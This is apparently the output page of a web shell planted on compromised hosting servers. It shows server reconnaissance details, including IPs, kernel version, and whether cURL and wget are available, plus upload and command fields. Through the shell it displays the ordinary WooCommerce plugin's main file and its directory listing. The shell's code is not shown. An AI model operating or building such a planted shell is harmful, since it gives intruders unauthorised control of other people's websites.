Server IP : 192.250.235.76 / Your IP : 45.90.210.12
System : Linux s2968.sgp1.stableserver.net 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
PHP Version : 8.2.29
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
1902110114081995
Server IP : 198.54.116.172 / Your IP : 216.73.216.36
System : Linux server322.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : mail
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Upload Files :
Command :
Current File : /home/sadasgfe/fashiondebate.pk/wp-content/plugins/woocommerce//woocommerce.php
<?php
/**
* Plugin Name: WooCommerce
* Plugin URI: https://woocommerce.com/
* Description: An ecommerce toolkit that helps you sell anything. Beautifully.
* Version: 10.4.3
* Author: Automattic
* Author URI: https://woocommerce.com
* Text Domain: woocommerce
* Domain Path: /i18n/languages/
* Requires at least: 6.8
* Requires PHP: 7.4
*
* @package WooCommerce
*/
defined( 'ABSPATH' ) || exit;
if ( ! defined( 'WC_PLUGIN_FILE' ) ) {
define( 'WC_PLUGIN_FILE', __FILE__ );
}
// Load core packages and the autoloader.
require __DIR__ . '/src/Autoloader.php';
require __DIR__ . '/src/Packages.php';
if ( ! \Automattic\WooCommerce\Autoloader::init() ) {
return;
}
\Automattic\WooCommerce\Packages::init();
// Include the main WooCommerce class.
if ( ! class_exists( 'WooCommerce', false ) ) {
include_once dirname( WC_PLUGIN_FILE ) . '/includes/class-woocommerce.php';
}
// Initialize dependency injection.
$GLOBALS['wc_container'] = new Automattic\WooCommerce\Container();
/**
* Returns the main instance of WC.
*
* @since 2.1
* @return WooCommerce
*/
function WC() { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionNameInvalid
return WooCommerce::instance();
}
/**
* Returns the WooCommerce object container.
* Code in the `includes` directory should use the container to get instances of classes in the `src` directory.
*
* @since 4.4.0
* @return \Automattic\WooCommerce\Container The WooCommerce object container.
*/
function wc_get_container() {
return $GLOBALS['wc_container'];
}
// Global for backwards compatibility.
$GLOBALS['woocommerce'] = WC();
// Jetpack's Rest_Authentication needs to be initialized even before plugins_loaded.
if ( class_exists( \Automattic\Jetpack\Connection\Rest_Authentication::class ) ) {
\Automattic\Jetpack\Connection\Rest_Authentication::init();
}
Name
Size
Last Modified
Owner / Group
Permissions
Options
.. -- January 11 2026 16:47:54 sadasgfe / sadasgfe 0755 assets -- December 22 2025 16:57:23 sadasgfe / sadasgfe 0755 i18n -- December 22 2025 16:57:25 sadasgfe / sadasgfe 0755 includes -- December 22 2025 16:57:25 sadasgfe / sadasgfe 0755 lib -- December 22 2025 16:57:25 sadasgfe / sadasgfe 0755 packages -- December 22 2025 16:57:23 sadasgfe / sadasgfe 0755 patterns -- December 22 2025 16:57:25 sadasgfe / sadasgfe 0755 sample-data -- December 22 2025 16:57:26 sadasgfe / sadasgfe 0755 src -- December 22 2025 16:57:26 sadasgfe / sadasgfe 0755 templates -- December 22 2025 16:57:26 sadasgfe / sadasgfe 0755 vendor -- December 22 2025 16:57:26 sadasgfe / sadasgfe 0755 license.txt 35.467 KB December 22 2025 16:57:25 sadasgfe / sadasgfe 0644 phpstan-baseline.neon 3.84 MB December 22 2025 16:57:26 sadasgfe / sadasgfe 0644 readme.txt 19.882 KB December 22 2025 16:57:26 sadasgfe / sadasgfe 0644 uninstall.php 5.819 KB December 22 2025 16:57:26 sadasgfe / sadasgfe 0644 woocommerce.php 1.803 KB December 22 2025 16:57:26 sadasgfe / sadasgfe 0644